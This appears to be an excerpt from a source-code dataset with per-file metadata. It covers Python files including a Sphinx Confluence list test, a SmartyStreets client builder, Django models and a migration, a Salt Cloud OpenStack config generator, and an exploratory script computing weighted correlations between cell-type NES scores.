| 28.518519 | 77 | 0.59697 | 243 | 2,310 | 5.506173 | 0.255144 | 0.106876 | 0.082212 | 0.059791 | 0.587444 | 0.573991 | 0.483558 | 0.398356 | 0.347534 | 0.347534 | 0 | 0.006571 | 0.275325 | 2,310 | 80 | 78 | 28.875 | 0.792712 | 0.009091 | 0 | 0.616667 | 0 | 0 | 0.693485 | 0.212505 | 0 | 0 | 0 | 0 | 0.233333 | 1 | 0.05 | false | 0 | 0.066667 | 0 | 0.116667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df709514b8d346cc0a38a3bd3f1378bb77a71fa2 | 4,561 | py | Python | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 90 | 2016-07-21T00:39:19.000Z | 2019-03-08T08:27:17.000Z | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 124 | 2016-10-18T20:06:48.000Z | 2019-03-08T04:41:53.000Z | tests/unit-tests/test_rst_lists.py | hazemelraffiee/confluencebuilder | c283e7fb513c156b9b6e0ba3694fc3e0468a74c9 | [
"BSD-2-Clause"
] | 39 | 2016-07-21T00:39:52.000Z | 2019-03-06T14:33:31.000Z | # -*- coding: utf-8 -*-
"""
:copyright: Copyright 2020-2022 Sphinx Confluence Builder Contributors (AUTHORS)
:license: BSD-2-Clause (LICENSE)
"""
from tests.lib.testcase import ConfluenceTestCase
from tests.lib.testcase import setup_builder
from tests.lib import parse
import os
class TestConfluenceRstLists(ConfluenceTestCase):
    @classmethod
    def setUpClass(cls):
        super(TestConfluenceRstLists, cls).setUpClass()

        cls.dataset = os.path.join(cls.datasets, 'common')
        cls.filenames = [
            'lists',
        ]

    @setup_builder('confluence')
    def test_storage_rst_lists(self):
        out_dir = self.build(self.dataset, filenames=self.filenames)

        with parse('lists', out_dir) as data:
            root_tags = data.find_all(recursive=False)
            self.assertEqual(len(root_tags), 3)

            # ##########################################################
            # bullet list
            # ##########################################################
            bullet_list = root_tags.pop(0)
            self.assertEqual(bullet_list.name, 'ul')

            items = bullet_list.find_all('li', recursive=False)
            self.assertEqual(len(items), 4)
            self.assertEqual(items[0].text.strip(), 'first bullet')
            self.assertEqual(items[2].text.strip(), 'third item')
            self.assertEqual(items[3].text.strip(), 'forth item')

            complex_list = items[1]
            complex_tags = complex_list.find_all(recursive=False)
            self.assertEqual(complex_tags[0].name, 'p')
            self.assertEqual(complex_tags[0].text.strip(), 'second item')
            self.assertEqual(complex_tags[1].name, 'p')
            self.assertEqual(complex_tags[1].text.strip(),
                             'second paragraph in the second item')
            self.assertEqual(complex_tags[2].name, 'p')
            self.assertEqual(complex_tags[2].text.strip(),
                             'third paragraph in the second item')
            self.assertEqual(complex_tags[3].name, 'ul')

            sublist = complex_tags[3].find_all('li', recursive=False)
            self.assertEqual(len(sublist), 3)

            # ##########################################################
            # enumerated list
            # ##########################################################
            enumerated_list = root_tags.pop(0)
            self.assertEqual(enumerated_list.name, 'ol')

            css_style = 'list-style-type: decimal'
            self.assertTrue(enumerated_list.has_attr('style'))
            self.assertTrue(css_style in enumerated_list['style'])

            items = enumerated_list.find_all('li', recursive=False)
            self.assertEqual(len(items), 2)
            self.assertEqual(items[0].text.strip(), 'enumerated a1')
            self.assertEqual(items[1].text.strip(), 'enumerated a2')

            # ##########################################################
            # enumerated list (styled)
            # ##########################################################
            enumerated_list = root_tags.pop(0)
            self.assertEqual(enumerated_list.name, 'ol')

            css_style = 'list-style-type: decimal'
            self.assertTrue(enumerated_list.has_attr('style'))
            self.assertTrue(css_style in enumerated_list['style'])

            items = enumerated_list.find_all('li', recursive=False)
            self.assertEqual(len(items), 4)

            css_style = 'list-style-type: lower-alpha'
            sublist1 = items[0].find('ol', recursive=False)
            self.assertIsNotNone(sublist1)
            self.assertTrue(sublist1.has_attr('style'))
            self.assertTrue(css_style in sublist1['style'])

            css_style = 'list-style-type: upper-alpha'
            sublist2 = items[1].find('ol', recursive=False)
            self.assertIsNotNone(sublist2)
            self.assertTrue(sublist2.has_attr('style'))
            self.assertTrue(css_style in sublist2['style'])

            css_style = 'list-style-type: decimal'
            sublist3 = items[2].find('ol', recursive=False)
            self.assertIsNotNone(sublist3)
            self.assertTrue(sublist3.has_attr('style'))
            self.assertTrue(css_style in sublist3['style'])

            css_style = 'list-style-type: lower-roman'
            sublist4 = items[3].find('ol', recursive=False)
            self.assertIsNotNone(sublist4)
            self.assertTrue(sublist4.has_attr('style'))
            self.assertTrue(css_style in sublist4['style'])
| 40.362832 | 80 | 0.557772 | 469 | 4,561 | 5.296375 | 0.215352 | 0.120773 | 0.072464 | 0.073269 | 0.582528 | 0.553543 | 0.338969 | 0.32649 | 0.252013 | 0.211755 | 0 | 0.01584 | 0.252576 | 4,561 | 112 | 81 | 40.723214 | 0.712819 | 0.042535 | 0 | 0.202703 | 0 | 0 | 0.101725 | 0 | 0 | 0 | 0 | 0 | 0.486486 | 1 | 0.027027 | false | 0 | 0.054054 | 0 | 0.094595 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df772962564e76e30a2b4e2a05a98491303c2ed2 | 5,776 | py | Python | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | smartystreets_python_sdk/client_builder.py | jasonrfarkas/smartystreets-python-sdk | bcb94efc09c795222eb1bd85544073a6cc063a46 | [
"Apache-2.0"
] | null | null | null | import smartystreets_python_sdk as smarty
from smartystreets_python_sdk.us_street import Client as USStreetClient
from smartystreets_python_sdk.us_zipcode import Client as USZIPClient
from smartystreets_python_sdk.us_extract import Client as USExtractClient
from smartystreets_python_sdk.us_autocomplete import Client as USAutocompleteClient
from smartystreets_python_sdk.international_street import Client as InternationalStreetClient
class ClientBuilder:
def __init__(self, signer):
"""
The ClientBuilder class helps you build a client object for one of the supported SmartyStreets APIs.
You can use ClientBuilder's methods to customize settings like maximum retries or timeout duration.
These methods are chainable, so you can usually get set up with one line of code.
"""
self.signer = signer
self.serializer = smarty.NativeSerializer()
self.http_sender = None
self.max_retries = 5
self.max_timeout = 10000
self.url_prefix = None
self.proxy = None
self.debug = None
self.header = None
self.INTERNATIONAL_STREET_API_URL = "https://international-street.api.smartystreets.com/verify"
self.US_AUTOCOMPLETE_API_URL = "https://us-autocomplete.api.smartystreets.com/suggest"
self.US_EXTRACT_API_URL = "https://us-extract.api.smartystreets.com"
self.US_STREET_API_URL = "https://us-street.api.smartystreets.com/street-address"
self.US_ZIP_CODE_API_URL = "https://us-zipcode.api.smartystreets.com/lookup"
def retry_at_most(self, max_retries):
"""
Sets the maximum number of times to retry sending the request to the API. (Default is 5)
Returns self to accommodate method chaining.
"""
self.max_retries = max_retries
return self
def with_max_timeout(self, max_timeout):
"""
The maximum time (in milliseconds) to wait for a connection, and also to wait for
the response to be read. (Default is 10000)
Returns self to accommodate method chaining.
"""
self.max_timeout = max_timeout
return self
def with_sender(self, sender):
"""
Default is a series of nested senders. (See build_sender()
Returns self to accommodate method chaining.
"""
self.http_sender = sender
return self
def with_serializer(self, serializer):
"""
Changes the Serializer from the default.
Returns self to accommodate method chaining.
"""
self.serializer = serializer
return self
def with_base_url(self, base_url):
"""
This may be useful when using a local installation of the SmartyStreets APIs.
base_url is a string that defaults to the URL for the API corresponding to the Client object being built.
Returns self to accommodate method chaining.
"""
self.url_prefix = base_url
return self
def with_proxy(self, host, username=None, password=None):
"""
Assigns a proxy through which to send all Lookups.
:param host: The proxy host including port, but not scheme. (example: localhost:8080)
:param username: Username to authenticate with the proxy server
:param password: Password to authenticate with the proxy server
:return: Returns self to accommodate method chaining.
"""
self.proxy = smarty.Proxy(host, username, password)
return self
def with_custom_header(self, custom_header):
"""
Create custom headers when necessary.
:param custom_header: Input your custom headers
:return: Returns self to accommodate method chaining
"""
self.header = custom_header
return self
def with_debug(self):
"""
Enables debug mode, which will print information about the HTTP request and response to the console.
Returns self to accommodate method chaining.
"""
self.debug = True
return self
def build_international_street_api_client(self):
self.ensure_url_prefix_not_null(self.INTERNATIONAL_STREET_API_URL)
return InternationalStreetClient(self.build_sender(), self.serializer)
def build_us_autocomplete_api_client(self):
self.ensure_url_prefix_not_null(self.US_AUTOCOMPLETE_API_URL)
return USAutocompleteClient(self.build_sender(), self.serializer)
def build_us_extract_api_client(self):
self.ensure_url_prefix_not_null(self.US_EXTRACT_API_URL)
return USExtractClient(self.build_sender(), self.serializer)
def build_us_street_api_client(self):
self.ensure_url_prefix_not_null(self.US_STREET_API_URL)
return USStreetClient(self.build_sender(), self.serializer)
def build_us_zipcode_api_client(self):
self.ensure_url_prefix_not_null(self.US_ZIP_CODE_API_URL)
return USZIPClient(self.build_sender(), self.serializer)
def build_sender(self):
if self.http_sender is not None:
return self.http_sender
sender = smarty.RequestsSender(self.max_timeout, self.proxy)
sender.debug = self.debug
sender = smarty.StatusCodeSender(sender)
if self.header is not None:
sender = smarty.CustomHeaderSender(self.header, sender)
if self.signer is not None:
sender = smarty.SigningSender(self.signer, sender)
if self.max_retries > 0:
sender = smarty.RetrySender(self.max_retries, sender)
sender = smarty.URLPrefixSender(self.url_prefix, sender)
return sender
def ensure_url_prefix_not_null(self, url):
if self.url_prefix is None:
self.url_prefix = url
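# --- Illustrative usage sketch (not part of the SDK itself) -------------------
# The ClientBuilder docstring above notes that its configuration methods are
# chainable. The sketch below shows that chaining; passing None as the signer is
# purely an assumption so the example builds without real credentials, and it
# only runs when this module is executed directly.
if __name__ == "__main__":
    example_builder = (ClientBuilder(None)       # None stands in for a real credentials/signer object
                       .retry_at_most(3)         # retry failed requests up to 3 times
                       .with_max_timeout(5000))  # 5-second timeout
    example_client = example_builder.build_us_street_api_client()
    print(example_client)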
| 38 | 113 | 0.691136 | 732 | 5,776 | 5.259563 | 0.230874 | 0.025714 | 0.027013 | 0.04987 | 0.315844 | 0.234805 | 0.203117 | 0.14987 | 0.061039 | 0.061039 | 0 | 0.003888 | 0.243075 | 5,776 | 151 | 114 | 38.251656 | 0.876715 | 0.279778 | 0 | 0.102564 | 0 | 0 | 0.065638 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.205128 | false | 0.025641 | 0.076923 | 0 | 0.487179 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df7cecff3f2a6d3cc5c868cae77bf8a3ce21f622 | 1,302 | py | Python | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | api/models.py | UAACC/pro | c5424574427ac3521cb70b0d62b841fa128f5166 | [
"MIT"
] | null | null | null | from django.db import models
from django.utils import timezone
from django.contrib.auth.models import AbstractUser
class Author(models.Model):
username = models.CharField(max_length=50, unique=True)
display_name = models.CharField(max_length=50, null=True, blank=True)
email = models.EmailField(null=True, blank=True)
github = models.URLField(null=True, blank=True)
bio = models.TextField(null=True, blank=True)
is_approved = models.BooleanField(default=False)
class Post(models.Model):
title = models.CharField(max_length=256)
description = models.CharField(max_length=256, default="")
authorId = models.ForeignKey(Author, on_delete=models.CASCADE, related_name="posts")
published = models.DateTimeField(default=timezone.now)
class Comment(models.Model):
content = models.CharField(max_length=256, default="")
authorId = models.ForeignKey(Author, on_delete=models.CASCADE)
postId = models.ForeignKey(Post, on_delete=models.CASCADE, related_name="comments")
# class FriendRequest(models.Model):
# from_user = models.ForeignKey(
#         Author, related_name='from_user', on_delete=models.CASCADE
# )
# to_user = models.ForeignKey(
# Author, related_name='to_user', on_delete=models.CASCADE
# ) | 39.454545 | 93 | 0.740399 | 164 | 1,302 | 5.75 | 0.341463 | 0.079533 | 0.09544 | 0.127253 | 0.469777 | 0.355249 | 0.265111 | 0.180276 | 0.180276 | 0.180276 | 0 | 0.011628 | 0.141321 | 1,302 | 33 | 94 | 39.454545 | 0.831843 | 0.208141 | 0 | 0 | 0 | 0 | 0.012695 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.157895 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
df84e85ea375a45ff61026ef8e92ba96e7e0f291 | 426 | py | Python | assessment/migrations/0010_assessment_open_status.py | sravanireddy1102/peerevaluationsystem | 3dc46447a6b3b581e8738db58e7b861c421cdc0f | [
"MIT"
] | 2 | 2020-06-17T15:17:19.000Z | 2020-10-06T08:03:29.000Z | assessment/migrations/0010_assessment_open_status.py | sravanireddy1102/peerevaluationsystem | 3dc46447a6b3b581e8738db58e7b861c421cdc0f | [
"MIT"
] | 3 | 2021-03-30T13:33:22.000Z | 2021-06-04T23:21:52.000Z | assessment/migrations/0010_assessment_open_status.py | YichengShen/EaglesPeerEvaluationSystem | 853e35bf569efb87dc56064e6ec44a4e3c95c537 | [
"MIT"
] | 1 | 2022-01-02T07:01:37.000Z | 2022-01-02T07:01:37.000Z | # Generated by Django 3.0.2 on 2020-04-29 20:22
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('assessment', '0009_auto_20200426_1103'),
]
operations = [
migrations.AddField(
model_name='assessment',
name='open_status',
field=models.BooleanField(default=True, verbose_name='open status'),
),
]
| 22.421053 | 80 | 0.622066 | 46 | 426 | 5.630435 | 0.782609 | 0.061776 | 0.108108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.099042 | 0.265258 | 426 | 18 | 81 | 23.666667 | 0.728435 | 0.105634 | 0 | 0 | 1 | 0 | 0.171504 | 0.060686 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8a62c0847934ac75248a075f1ad448f85f7372 | 1,347 | py | Python | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | null | null | null | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | 1 | 2021-06-01T21:55:56.000Z | 2021-06-01T21:55:56.000Z | build_utils/salt_utils.py | maharg101/gdl-100-provision | 71651d1f6dd40de841f99cb9a6d1accb16ea39c1 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
"""
salt_utils.py
Description: Utility methods for configuration of Salt Cloud.
Written by: maharg101 on 27th March 2018
"""
import io
import yaml
def generate_openstack_conf(params):
"""
Generate an openstack.conf file-like given the supplied params dict.
:param params: A dictionary containing parameters to use. See utils.populate_params.
:return: StringIO populated with the generated openstack configuration.
"""
openstack_conf_data = dict(
openstack=dict(
driver='openstack',
region_name=params['OS_REGION_NAME'],
auth=dict(
username=params['OS_USERNAME'],
password=params['OS_PASSWORD'],
project_id=params['OS_PROJECT_ID'],
auth_url=params['OS_AUTH_URL'],
user_domain_name=params['OS_USER_DOMAIN_NAME'],
project_domain_name=params['OS_PROJECT_DOMAIN_NAME'],
),
networks=[
dict(name='public', nat_source=True, routes_externally=True, routes_ipv4_externally=True),
dict(name=params['network_name'], nat_destination=True, default_interface=True),
]
)
)
openstack_conf = io.StringIO(yaml.dump(openstack_conf_data, default_flow_style=False))
return openstack_conf
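# --- Illustrative usage sketch -------------------------------------------------
# The docstring above says generate_openstack_conf expects a params dict (see
# utils.populate_params). The sketch below builds such a dict by hand -- the keys
# are the ones this module reads, but every value and the output filename are
# placeholder assumptions -- and writes the resulting YAML to a local file.
if __name__ == "__main__":
    example_params = {
        'OS_REGION_NAME': 'RegionOne',
        'OS_USERNAME': 'example-user',
        'OS_PASSWORD': 'example-password',
        'OS_PROJECT_ID': 'example-project-id',
        'OS_AUTH_URL': 'https://keystone.example.com:5000/v3',
        'OS_USER_DOMAIN_NAME': 'Default',
        'OS_PROJECT_DOMAIN_NAME': 'Default',
        'network_name': 'example-network',
    }
    conf = generate_openstack_conf(example_params)
    with open('openstack.conf.example', 'w') as f:
        f.write(conf.getvalue())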
| 34.538462 | 106 | 0.64588 | 154 | 1,347 | 5.38961 | 0.506494 | 0.06747 | 0.043373 | 0.043373 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.010989 | 0.256867 | 1,347 | 38 | 107 | 35.447368 | 0.818182 | 0.272457 | 0 | 0 | 1 | 0 | 0.134879 | 0.023182 | 0 | 0 | 0 | 0 | 0 | 1 | 0.043478 | false | 0.043478 | 0.086957 | 0 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8d73ce0b9ecd6d1a67506333d218eaea46a306 | 9,698 | py | Python | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | gather/weighted_corr.py | mrJeppard/clusterdb-ingest | f52f3ee03a1071ef15a63412e1e2085fdf74e584 | [
"MIT"
] | null | null | null | """
Weighted correlation of NES vectors. The idea is to weight positive values on either vector:
positions that are positive in either vector can be given more weight than positions that are
negative in both.
"""
import pandas as pd
import numpy as np
from scipy.spatial.distance import pdist
from scipy.spatial.distance import squareform
def m(x, w):
"""Weighted Mean"""
return np.sum(x * w) / np.sum(w)
def cov(x, y, w):
"""Weighted Covariance"""
return np.sum(w * (x - m(x, w)) * (y - m(y, w))) / np.sum(w)
def corr(x, y, w):
"""Weighted Correlation"""
return cov(x, y, w) / np.sqrt(cov(x, x, w) * cov(y, y, w))
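# --- Tiny illustration of the weighted helpers above (toy numbers, assumed) ---
# With equal weights the weighted correlation reduces to the ordinary Pearson
# correlation; upweighting selected positions makes those positions dominate
# the estimate.
_demo_x = np.array([1.0, 2.0, 3.0, 4.0])
_demo_y = np.array([1.5, 1.9, 3.2, 3.8])
_demo_w_equal = np.ones(4)
_demo_w_skewed = np.array([10.0, 1.0, 1.0, 1.0])
print("equal weights:", corr(_demo_x, _demo_y, _demo_w_equal))
print("skewed weights:", corr(_demo_x, _demo_y, _demo_w_skewed))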
def weighted_corr(x, y):
    # NOTE: this relies on a weights(x, y) helper that is not defined in this
    # module; the analysis below actually uses all_by_all() with std_weights().
    w = weights(x, y)
    return corr(x, y, w)
def all_by_all(df, weights=None):
if weights is None:
weights = df.std(axis=1).values.transpose()
sim_func = lambda x, y: corr(x, y, weights)
wd = pdist(df.transpose().values, metric=sim_func)
wd = squareform(wd)
wd = pd.DataFrame(wd, columns=df.columns, index=df.columns)
return wd
def std_weights(invivo_nes, invitro_nes):
std1 = invivo_nes.std(axis=1)
std2 = invitro_nes.std(axis=1)
return np.sqrt(std1.multiply(std2))
invivo_nes = pd.read_csv("./tmp/invivo.celltype.nes.csv", index_col=0)
#invitro_nes = pd.read_csv("./friedmanC.celltype.nesscores.csv", index_col=0)
invitro_nes = pd.read_csv("./tmp/invitro.res_0_4.nes.csv", index_col=0)
#invitro_nes = pd.read_csv("./tmp/test2.tab", index_col=0)
invivo_nes.head()
invivo_nes.shape
invivo_nes.isna().sum()
invitro_nes.shape
invitro_nes.isna().sum()
invivo_nes = invivo_nes.dropna(axis=0, how="any")
invivo_nes.shape
invitro_nes = invitro_nes.dropna(axis=0, how="any")
invitro_nes.shape
pathway_intersect = list(set(invivo_nes.index).intersection(invitro_nes.index))
len(pathway_intersect)
invivo_nes = invivo_nes.loc[pathway_intersect]
invitro_nes = invitro_nes.loc[pathway_intersect]
nes = pd.concat([invivo_nes, invitro_nes], axis=1)
nes.head()
corrs = all_by_all(nes, std_weights(invivo_nes, invitro_nes))
corrs.to_csv("./corrs.invivo-celltype.invitro-res-04.csv")
corrs.columns
#corrs["aCM"][invitro_nes.columns].sort_values()
corrs["pluripotent"][invivo_nes.columns].sort_values(ascending=False)
corrs["definitive_cardiomyocyte"][invivo_nes.columns].sort_values(ascending=False)
corrs["non_contractile"][invivo_nes.columns].sort_values(ascending=False)
#corrs["aCM"].sort_values()
################################################
dataset_name = "fetal combined heart of cells"
cluster_solution_name = "heart cell types"
size = "similarity"
color = "MYL7"
color_centroids = pd.read_csv("invitroCombined.res_0_4.centroids.csv", index_col=0).loc[color]
#color_centroids = pd.read_csv("fetalCombined.celltype.centroids.csv", index_col=0).loc[color]
cluster_cell_counts = pd.read_csv("invitroCombined.cluster.cellcounts.csv", index_col=0)
other_dataset = "in vitro combined heart of cells"
other_species = "human"
other_study = "in vitro"
other_organ = "heart"
other_cluster_solution_name = "louvain resolution 0.4"
big_dict = {
"dataset_name": dataset_name,
"cluster_solution_name": cluster_solution_name,
"size_by": size,
"color_by": color,
"cluster_similarities": []
}
for celltype in invivo_nes:
cs_dict = {
"dataset": {
"name": other_dataset,
"species": other_species,
"organ": other_organ,
"study": other_study
},
"compared_to_cluster": celltype,
"cluster_solution_name": other_cluster_solution_name,
"clusters": []
}
for cluster in invitro_nes:
cluster_dict = {
"name": cluster,
"size": corrs.loc[celltype, cluster].item(),
"color": color_centroids[cluster].item(),
"cell_count": cluster_cell_counts.loc[int(cluster)].item()
}
cs_dict["clusters"].append(cluster_dict)
big_dict["cluster_similarities"].append(cs_dict)
###################
import json
with open('example-similarities.json', 'w') as outfile:
json.dump(big_dict, outfile, indent=4)
print(celltype)
#################
import scanpy as sc
filenames_and_days = [
("./clusterd-friedman/day0-rep12.h5ad","Day0"),
("./clusterd-friedman/day15-rep12.h5ad", "Day15"),
("./clusterd-friedman/day2-rep12.h5ad", "Day2"),
("./clusterd-friedman/day30-rep12.h5ad", "Day30"),
("./clusterd-friedman/day5-rep12.h5ad", "Day5"),
]
dfs = []
for adfile, day in filenames_and_days:
ad = sc.read(adfile)
df = ad.obs[["cell_type"]]
df = df.dropna(axis=1)
df.index = ["%s-%s" % (name, day) for name in df.index]
dfs+=[df]
ctypes = pd.concat(dfs, axis=0)
ctypes.head()
ctypes.to_csv("friedman-celltype-assignments.csv", header=True)
ctypes.head()
len(ctypes.index) == len(ctypes.index.unique())
"""
{
dataset_name: "fetal combined heart of cells",
cluster_solution_name: “heart cell types”
size_by: 'similarity',
color_by: ‘MYL7',
cluster_similarities: [
{
dataset: {
name: 'in vitro heart combined',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vitro',,
},
compared_to_cluster: “cell type 1”,
cluster_solution_name: 'louvain resolution .25',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(repeated...)
},
...
]
}
#############################
# Dont go below here....
##############################
invitro_nes2.head()
n1 = invivo_nes1[invivo_nes1.columns[0]]
n2 = invitro_nes2[invitro_nes2.columns[2]]
c = invivo_nes1.corr()
c[c.columns[0]].sort_values()
c['2']
c.head()
len(set(n1.index).intersection(n2.index))
n1 = n1[list(set(n1.index).intersection(n2.index))]
n2 = n2[list(set(n1.index).intersection(n2.index))]
##############################
import numpy as np
# Without weight.
np.corrcoef(n1,n2)
x, y = n1, n2
(x>0).sum()
(y>0).sum()
positive_ind = np.logical_or(x>0, y>0)
positive_ind.sum()
weights = np.zeros((len(positive_ind),1))
weights[positive_ind] = 10 / positive_ind.sum()
weights[~positive_ind] = 1 / (len(positive_ind) - positive_ind.sum())
# alternative paying attention to stdard devaition across clusters
weights = nes.std(axis=1).values.transpose()
# Gives you way smaller
#
(100 / 5)
weights.sum()
1 - corr(n1.values, n2.values, weights.transpose())
sim_func = lambda x, y: 1 - corr(x,y, weights)
wd = pdist(nes.transpose().values, metric=sim_func)
wd = squareform(wd)
wd.shape
wd
wd = pd.DataFrame(wd, columns=invivo_nes.columns, index=invivo_nes.columns)
wd.head()
wd["aCM"].sort_values()
nes.head()
aa = all_by_all(nes)
aa.head()
aa["aCM"].sort_values()
ab["aCM"][invitro_nes.columns].sort_values()
closest = ab["aCM"][invitro_nes.columns].sort_values().index[0:2]
ad.obs["is"] = np.logical_or(ad.obs["louvain"])
aCMMarkers = ["res.25", "NPPA", "PAM", "MYL7"]
import scanpy as sc
ad = sc.read("in_vitro_clustered.h5ad")
sc.tl.louvain(ad, resolution=.25, key_added="res.25")
sc.pl.umap(ad, color= aCMMarkers)
dataset_name = "in vivo heart of cells"
cluster_solution_name = "heart cell types"
size = "similarity"
color = "NPPA"
other_dataset_name = "in vitro heart of cells"
other_cluster_solution_name = "louvain resolution .25"
import pandas as pd
centroids_invivo = pd.read_csv("fetalCombined.celltype.centroids.csv", index_col=0)
centroids_invitro = pd.read_csv("invitroCombined.res_0_4.centroids.csv", index_col=0)
possible_markers = ["MYL7", "PAM"]
import scanpy as sc
import numpy as np
#ad = sc.read("tm")
len(ad.obs["celltype"].unique())
np.sum(ad[:, possible_markers[0]].X > 0)
def fc_vs_all(centroids):
fc = pd.DataFrame(index=centroids.index)
for cname in centroids:
other_names = [cn for cn in centroids if cn != cname]
#print(other_names)
centroid = centroids[cname]
others_centroid = centroids[other_names]
#print(others_centroid.head())
others_centroid = others_centroid.sum(axis=1)
#print(others_centroid)
others_centroid = np.log2(others_centroid + 2)
log_centroid = np.log2(centroid + 2)
        fc[cname] = log_centroid.sub(others_centroid, axis=0)
#print(fc.head())
return fc
centroids_invitro.loc[possible_markers]
centroids_invivo.loc[color]
centroids_invivo.index
invivo_fc = fc_vs_all(centroids_invivo)
invitro_fc = fc_vs_all(centroids_invitro)
invitro_fc.loc[possible_markers].max(axis=1)
invivo_fc.loc[color]
"""
{
cluster_solution_name: “heart cell types”
size_by: 'similarity',
color_by: ‘MYL7',
cluster_similarities: [
{
dataset: {
name: 'in vitro heart combined',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vitro',,
},
compared_to_cluster: “cell type 1”,
cluster_solution_name: 'louvain resolution .25',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(repeated...)
},
...
]
}
"""
"""
{
gene: 'ALK', / cluster: 'userCluster1',
size_by: 'sensitivity',
color_by: 'z_stat',
cluster_solutions: [
{
dataset: {
name: 'dataset name 2',
species: 'Homo sapiens',
organ: 'heart',
study: 'in vivo',,
},
cluster_name: 'solution 2',
clusters: [
{
name: 'A',
size: 15,
color: -0.75,
cell_count: 34,
},
{
name: 'B',
size: 30,
color: 0.5,
cell_count: 88
},
...
],
},
{
(another dataset/cluster-solution)
},
...
]
}
"""
| 24.739796 | 108 | 0.642813 | 1,330 | 9,698 | 4.508271 | 0.185714 | 0.03002 | 0.038025 | 0.016011 | 0.356237 | 0.319713 | 0.257505 | 0.227318 | 0.204803 | 0.190127 | 0 | 0.022465 | 0.187564 | 9,698 | 391 | 109 | 24.803069 | 0.738546 | 0 | 0 | 0.196721 | 0 | 0 | 0.185538 | 0.088939 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.032787 | null | null | 0.005464 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
df8eda08eeceb3a4e4b4d62b56b2aacf6a21c336 | 16,807 | py | Python | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
] | 3 | 2017-06-17T10:13:38.000Z | 2019-01-18T18:40:59.000Z | highearthorbit.py | orithena/highearthorbit | a444dba54f6fdb5b84cf5bd4c3e24f4bd1796fb1 | [
"MIT"
